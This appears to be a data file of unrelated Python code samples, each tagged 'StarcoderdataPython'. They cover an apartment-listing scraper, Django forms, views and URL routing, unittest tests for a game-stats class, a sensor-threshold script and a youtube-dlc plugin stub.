"""Given a beautifulSoup parsed page, extract the one time and monthly fees"""
fields['monthFees'] = ''
fields['onceFees'] = ''
if soup is None: return
obj = soup.find('div', class_='monthlyFees')
if obj is not None:
for expense in obj.find_all('div', class_='fee'):
description = expense.find(
'div', class_='descriptionWrapper').getText()
description = prettify_text(description)
price = expense.find('div', class_='priceWrapper').getText()
price = prettify_text(price)
fields['monthFees'] += '* ' + description + ': ' + price + '\n'
# get one time fees
obj = soup.find('div', class_='oneTimeFees')
if obj is not None:
for expense in obj.find_all('div', class_='fee'):
description = expense.find(
'div', class_='descriptionWrapper').getText()
description = prettify_text(description)
price = expense.find('div', class_='priceWrapper').getText()
price = prettify_text(price)
fields['onceFees'] += '* ' + description + ': ' + price + '\n'
# remove ending \n
fields['monthFees'] = fields['monthFees'].strip()
fields['onceFees'] = fields['onceFees'].strip()
def average_field(obj1, obj2, field):
"""Take the average given two objects that have field values followed by (same) unit"""
val1 = float(prettify_text(obj1[field]).split()[0])
val2 = float(prettify_text(obj2[field]).split()[0])
unit = ' ' + prettify_text(obj1[field]).split()[1]
avg = 0.5 * (val1 + val2)
if field == 'duration':
avg = int(avg)
return str(avg) + unit
def get_property_name(soup, fields):
"""Given a beautifulSoup parsed page, extract the name of the property"""
fields['name'] = ''
# get the name of the property
obj = soup.find('h1', class_='propertyName')
if obj is not None:
name = obj.getText()
name = prettify_text(name)
fields['name'] = name
def find_addr(script, tag):
"""Given a script and a tag, use python find to find the text after tag"""
tag = tag + ": \'"
start = script.find(tag)+len(tag)
end = script.find("\',", start)
return script[start : end]
def get_property_address(soup, fields):
"""Given a beautifulSoup parsed page, extract the full address of the property"""
address = ""
# They changed how this works so I need to grab the script
script = soup.findAll('script', type='text/javascript')[2].text
# The address is everything in quotes after listingAddress
address = find_addr(script, "listingAddress")
# City
address += ", " + find_addr(script, "listingCity")
# State
address += ", " + find_addr(script, "listingState")
# Zip Code
address += " " + find_addr(script, "listingZip")
fields['address'] = address
def parse_config_times(given_time):
"""Convert the tomorrow at given_time New York time to seconds since epoch"""
# tomorrow's date
tomorrow = datetime.date.today() + datetime.timedelta(days=1)
# tomorrow's date/time string based on time given
date_string = str(tomorrow) + ' ' + given_time
# tomorrow's datetime object
format_ = '%Y-%m-%d %I:%M %p'
date_time = datetime.datetime.strptime(date_string, format_)
# the epoch
epoch = datetime.datetime.utcfromtimestamp(0)
# return time since epoch in seconds, string without decimals
time_since_epoch = (date_time - epoch).total_seconds()
return str(int(time_since_epoch))
def save_file_to_s3(bucket, fname):
s3 = boto3.resource('s3')
data = open(fname, 'rb')
s3.Bucket(bucket).put_object(Key=fname, Body=data)
def main():
"""Read from the config file"""
conf = configparser.ConfigParser()
config_file = os.path.join(os.path.dirname(__file__), "config.ini")
conf.read(config_file)
# get the apartments.com search URL(s)
apartments_url_config = conf.get('all', 'apartmentsURL')
urls = apartments_url_config.replace(" ", "").split(",")
# get the name of the output file
fname = conf.get('all', 'fname') + '.csv'
create_csv(urls, fname)
save_file_to_s3('mg-apartments', fname)
if __name__ == '__main__':
main()
| StarcoderdataPython |
1754735 | <filename>devdb/forms.py
from django import forms
from models import DeveloperRegistration
from datetime import datetime
import logging
import md5
class DeveloperRegistrationForm(forms.Form):
contact_name = forms.CharField(initial='<NAME>')
website_url = forms.URLField(label='Your website')
email = forms.EmailField(max_length=255)
tool_id = forms.CharField(max_length=40)
def clean_tool_id(self):
tool_id = self.cleaned_data['tool_id']
q = DeveloperRegistration.all().filter("tool_id =", tool_id)
if q.get():
raise forms.ValidationError("A tool with this name has already been registered!")
return tool_id
def save(self):
tool_id = self.cleaned_data['tool_id']
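        # The datastore key_name is the MD5 hex digest of the tool id, so saving
        # the same tool id again maps to the same entity instead of creating a
        # duplicate registration.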
reg = DeveloperRegistration(
key_name = md5.new(str(tool_id)).hexdigest(),
contact_name = self.cleaned_data['contact_name'],
website_url = self.cleaned_data['website_url'],
email = self.cleaned_data['email'],
tool_id = tool_id,
created_on = datetime.now()
)
reg.put()
return reg
| StarcoderdataPython |
3395958 | from django.shortcuts import render
import requests
import json
import pandas as pd
# Create your views here.
def parseapi(request):
api= requests.get('https://s3.amazonaws.com/open-to-cors/assignment.json')
print(api.status_code)
data = api.text
# storing the JSON response from url in data
parse_json = json.loads(data)
# count = parse_json['count']
# print(count)
products = parse_json['products']
# print(products)
# print(type(products))
data=[]
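    # Flatten the {key: product} mapping into a list of product dicts so it can
    # be loaded into a DataFrame.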
for key in products:
x=products[key]
data.append(x)
# print(data)
df = pd.DataFrame.from_dict(data)
    df = df.sort_values(by=['popularity'])
context=[]
for index, row in df.iterrows():
x=row['subcategory']
y=row['title']
z=row['price']
za=row['popularity']
con={'x':x,'y':y,'z':z,'za':za}
context.append(con)
print(context)
print(type(context))
return render(request, 'parseapi/parseapi.html',{'context':context})
# def index(request):
# context= {}#request.POST.get('context')
# return render(request,"account/index.html",context)
| StarcoderdataPython |
102684 | from .assigners import BaseAssigner, HungarianAssigner
from .builder import build_sampler, build_assigner
from .samplers import BaseSampler, PseudoSampler, SamplingResult
from .transforms import hoi2result
__all__ = [
'BaseAssigner', 'HungarianAssigner', 'build_assigner', 'build_sampler',
'BaseSampler', 'PseudoSampler', 'SamplingResult', 'hoi2result'
]
| StarcoderdataPython |
90674 | <filename>test_stats.py
from copy import copy, deepcopy
import os
import time
import unittest
from characteristics_damages import *
from stats import Stats
class TestStats(unittest.TestCase):
def test_create_empty(self):
empty_characteristics = [0 for _ in range(CHARACTERISTICS_COUNT)]
empty_damages = [0 for _ in range(DAMAGES_COUNT)]
stats = Stats()
self.assertListEqual(stats.characteristics, empty_characteristics)
self.assertListEqual(stats.damages, empty_damages)
def test_create_from_invalid_json(self):
invalid_json_string = '{'
with self.assertRaises(ValueError):
Stats.from_json_string(invalid_json_string)
def test_create_from_incomplete_json(self):
json_missing_all_fields = '{}'
json_missing_characteristics_field = '{"name": "name", "damages": {}}'
json_missing_damages_field = '{"short_name": "sn", "bonus_crit_chance": 0, "name": "name", "characteristics": {}}'
json_missing_bonus_crit_chance_field = '{"short_name": "sn", "name": "name", "damages": {}, "characteristics": {}}'
json_missing_name_field = '{"short_name": "sn", "bonus_crit_chance": 0, "damages": {}, "characteristics": {}}'
json_missing_short_name_field = '{"name": "name", "bonus_crit_chance": 0, "damages": {}, "characteristics": {}}'
json_missing_characteristics = '{"bonus_crit_chance": 0, "damages": {}, "characteristics": {}, "name": ""}'
# Double { and } because of .format
json_missing_damages = '{{"short_name": "sn", "bonus_crit_chance": 0, "name": "name", "damages": {{}}, "characteristics": {0}}}'.format([0 for _ in range(CHARACTERISTICS_COUNT)]).replace("'", '"')
with self.assertRaises(KeyError):
Stats.from_json_string(json_missing_all_fields)
Stats.from_json_string(json_missing_characteristics_field)
Stats.from_json_string(json_missing_bonus_crit_chance_field)
Stats.from_json_string(json_missing_name_field)
Stats.from_json_string(json_missing_short_name_field)
Stats.from_json_string(json_missing_damages_field)
Stats.from_json_string(json_missing_characteristics)
Stats.from_json_string(json_missing_damages)
def test_create_from_valid_json(self):
valid_json_string = '{{"short_name": "sn", "bonus_crit_chance": 0, "name": "name", "damages": {0}, "characteristics": {1}}}'.format(
[0 for _ in range(DAMAGES_COUNT)],
[0 for _ in range(CHARACTERISTICS_COUNT)]
).replace("'", '"')
Stats.from_json_string(valid_json_string)
def test_different_neutral_strength(self):
json_string = '{{"short_name": "sn", "bonus_crit_chance": 0, "name": "", "damages": {0}, "characteristics": {1}}}'.format(
[0 for _ in range(DAMAGES_COUNT)],
[100 * (characteristic == NEUTRAL) for characteristic in range(CHARACTERISTICS_COUNT)]
).replace("'", '"')
with self.assertRaises(ValueError):
Stats.from_json_string(json_string)
def test_create_from_file(self):
        filepath = os.path.join('test_files', 'test_stats.json')
# Check if the file still exists and is accessible
assert os.path.isfile(filepath) and os.access(filepath, os.R_OK)
stats = Stats.from_file(filepath)
self.assertEqual(stats.get_name(), 'test stats')
def test_get_characteristic(self):
stats = Stats()
self.assertEqual(stats.get_characteristic(STRENGTH), 0)
with self.assertRaises(TypeError):
stats.get_characteristic("string")
def test_set_characteristic(self):
stats = Stats()
stats.set_characteristic(INTELLIGENCE, 100)
self.assertEqual(stats.get_characteristic(INTELLIGENCE), 100)
with self.assertRaises(TypeError):
stats.set_characteristic("string", 0)
stats.set_characteristic(LUCK, "string")
def test_neutral_strength_equality(self):
stats = Stats()
stats.set_characteristic(STRENGTH, 150)
self.assertEqual(stats.get_characteristic(NEUTRAL), 150)
with self.assertRaises(TypeError):
stats.set_characteristic(NEUTRAL, 100)
def test_set_bonus_crit_chance(self):
stats = Stats()
stats.set_bonus_crit_chance(0.56)
self.assertEqual(stats.get_bonus_crit_chance(), 0.56)
stats.set_bonus_crit_chance(1)
self.assertEqual(stats.get_bonus_crit_chance(), 1.0)
with self.assertRaises(TypeError):
stats.set_bonus_crit_chance("string")
with self.assertRaises(ValueError):
stats.set_bonus_crit_chance(1.5)
def test_set_name(self):
stats = Stats()
stats.set_name("name")
self.assertEqual(stats.get_name(), "name")
stats.set_name(42)
self.assertEqual(stats.get_name(), "42")
def test_set_short_name(self):
stats = Stats()
stats.set_short_name("name")
self.assertEqual(stats.get_short_name(), "name")
stats.set_short_name(42)
self.assertEqual(stats.get_short_name(), "42")
def test_valid_simple_addition(self):
stats1 = Stats()
stats1.set_characteristic(INTELLIGENCE, 100)
stats1.set_damage(BASIC, 20)
stats1.set_bonus_crit_chance(0.3)
stats1.set_name("stats1")
stats2 = Stats()
stats2.set_characteristic(INTELLIGENCE, 80)
stats2.set_damage(BASIC, 15)
stats2.set_bonus_crit_chance(0.5)
stats2.set_name("stats2")
stats3 = stats1 + stats2
self.assertEqual(stats3.get_characteristic(INTELLIGENCE), 100 + 80)
self.assertEqual(stats3.get_damage(BASIC), 20 + 15)
self.assertAlmostEqual(stats3.get_bonus_crit_chance(), 0.3 + 0.5)
self.assertEqual(stats3.get_name(), "stats1")
def test_valid_sum(self):
stats1 = Stats()
stats1.set_characteristic(AGILITY, 40)
stats1.set_name('stats1')
stats2 = Stats()
stats2.set_characteristic(AGILITY, 50)
stats3 = sum([stats1, stats2])
self.assertEqual(stats3.get_characteristic(AGILITY), 40 + 50)
def test_invalid_sum(self):
stats1 = Stats()
with self.assertRaises(TypeError):
stats2 = stats1 + 1
stats2 = stats1 + "string"
def test_performance_deep_copy(self):
stats = Stats()
stats.set_characteristic(AGILITY, 779)
stats.set_characteristic(LUCK, 86)
stats.set_characteristic(STRENGTH, 101)
stats.set_characteristic(INTELLIGENCE, 81)
stats.set_damage(POWER, 121)
stats.set_damage(BASIC, 17)
stats.set_damage(NEUTRAL, 29)
stats.set_damage(EARTH, 31)
stats.set_damage(FIRE, 7)
stats.set_damage(WATER, 7)
stats.set_damage(AIR, 49)
stats.set_damage(SPELL, 7)
N = 10000
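        # Benchmark Stats.from_existing over N iterations and report the total
        # and per-copy time.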
t0 = time.perf_counter_ns()
for _ in range(N):
stats_copied = Stats.from_existing(stats)
t1 = time.perf_counter_ns()
print(f"\n{N} repetitions : {1e-6 * (t1 - t0):.1f} ms total ({1e-3 * (t1 - t0) / N:.1f} µs / copy)")
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
1780142 | from __future__ import unicode_literals
from youtube_dlc.extractor.common import InfoExtractor
class SamplePluginIE(InfoExtractor):
_WORKING = False
IE_DESC = False
_VALID_URL = r'^sampleplugin:'
def _real_extract(self, url):
        self.to_screen('URL "%s" successfully captured' % url)
| StarcoderdataPython |
3303820 | <filename>threads/kmeans_test.py
def main():
## Initialisation
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import math
df=pd.read_csv('sampledata.csv')
#print(df1)
a=df.iloc[0]
b=df.iloc[1]
c=df.iloc[2]
d=df.iloc[3]
e=df.iloc[4]
f=df.iloc[5]
g=df.iloc[6]
h=df.iloc[7]
i=df.iloc[8]
l1=list(a[2:])
l2=list(b[2:])
l3=list(c[2:])
l4=list(d[2:])
l5=list(e[2:])
l6=list(f[2:])
l7=list(g[2:])
l8=list(h[2:])
l=list(i[2:])
#dict={l1:df.iloc[0][0:1],l2:df.iloc[1][0:1],l3:df.iloc[2][0:1],l4:df.iloc[3][0:1],l5:df.iloc[4][0:1],l6:df.iloc[5][0:1],l7:df.iloc[6][0:1],l8:df.iloc[7][0:1]}
def diff(x,xp):
return math.sqrt((x-xp)**2)
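    # values() computes the per-feature absolute deviation of a sensor row from
    # the reference reading; result() flags a row as "extreme conditions" when
    # its deviations do not match the expected baseline pattern.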
def values(l,test):
a=[]
for i in range(0,len(l)):
a.append(diff(l[i],test[i]))
return a
ideal=[250,90,7.7,95,2,1.5]
t1=values(l1,ideal)
t2=values(l2,ideal)
t3=values(l3,ideal)
t4=values(l4,ideal)
t5=values(l5,ideal)
t6=values(l6,ideal)
t7=values(l7,ideal)
t8=values(l8,ideal)
#print(t1,t2,t3,t4,t5,t6,t7,t8)
'''def result(t,o):
if (t[0]!=10.0 and t[1]!=10.0 and t[2]!=0.0 and t[3]!=0.0 and t[4]!=11.0 and t[5]!=0.5):
print("extreme conditions, coordinates are")
print(o[0:2].to_string())
print("\n")
else:
print("normal conditions\n")'''
def result(t,o):
if (t[0]!=10.0 and t[1]!=10.0 and t[2]!=0.0 and t[3]!=0.0 and t[4]!=11.0 and t[5]!=0.5):
return("extreme conditions, coordinates are", o[0:2].to_string())
else:
return("normal conditions ")
d1=result(t1,a)
d2=result(t2,b)
d3=result(t3,c)
d4=result(t4,d)
#print(a[0:2].to_string())
dat=open("data.txt",'w')
dat.write(str(d1))
dat.write(str(d2))
dat.write(str(d3))
    dat.write(str(d4))
    dat.close()

if __name__ == '__main__':
    main()
| StarcoderdataPython |
3243350 | <gh_stars>0
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.conf import settings
from django.conf.urls import patterns, include, url
from django.conf.urls.static import static
from django.views.generic import TemplateView
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
url(r'^$', # noqa
TemplateView.as_view(template_name='base.html'),
name="home"),
url(r'^about/$',
TemplateView.as_view(template_name='pages/about.html'),
name="about"),
url(r'^animals/', include('animals.urls')),
url(r'^groups/', include('groups.urls')),
url(r'^finances/', include('finances.urls')),
url(r'^records/', include('records.urls')),
url(r'^health/', include('health.urls')),
url(r'^users/', include('smartmin.users.urls')),
# Uncomment the next line to enable the admin:
url(r'^admin/', include(admin.site.urls)),
# User management
url(r'^users/', include("users.urls", namespace="users")),
url(r'^accounts/', include('allauth.urls')),
# Uncomment the next line to enable avatars
url(r'^avatar/', include('avatar.urls')),
# RapidSMS core URLs
(r'^accounts/', include('rapidsms.urls.login_logout')),
url(r'^$', 'rapidsms.views.dashboard', name='rapidsms-dashboard'),
# RapidSMS contrib app URLs
(r'^httptester/', include('rapidsms.contrib.httptester.urls')),
#(r'^locations/', include('rapidsms.contrib.locations.urls')),
(r'^messagelog/', include('rapidsms.contrib.messagelog.urls')),
(r'^messaging/', include('rapidsms.contrib.messaging.urls')),
(r'^registration/', include('rapidsms.contrib.registration.urls')),
# Third party URLs
(r'^selectable/', include('selectable.urls')),
(r'^select2/', include('django_select2.urls')),
) + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| StarcoderdataPython |